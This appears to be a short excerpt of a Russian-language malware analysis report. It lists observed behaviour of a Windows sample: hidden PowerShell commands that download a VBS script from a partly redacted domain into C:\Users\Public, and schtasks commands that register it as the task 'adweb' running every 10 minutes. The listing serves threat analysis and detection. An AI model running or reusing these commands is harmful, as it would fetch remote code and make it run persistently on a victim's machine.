Техническая информация
- <SYSTEM32>\tasks\adweb
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nologo -command "Invoke-WebRequest -Uri http://ad###ack1.xyz/dl/1.vbs -OutFile C:\Users\Public\1.vbs"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nologo -command "schtasks.exe /Create /TN adweb /TR C:\Users\Public\1.vbs /SC Minute /MO 10"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nologo -command "Invoke-WebRequest -Uri http://ad###ack1.xyz/dl/1.vbs -OutFile C:\Users\Public\1.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nologo -command "schtasks.exe /Create /TN adweb /TR C:\Users\Public\1.vbs /SC Minute /MO 10"
- '<SYSTEM32>\schtasks.exe' /Create /TN adweb /TR C:\Users\Public\1.vbs /SC Minute /MO 10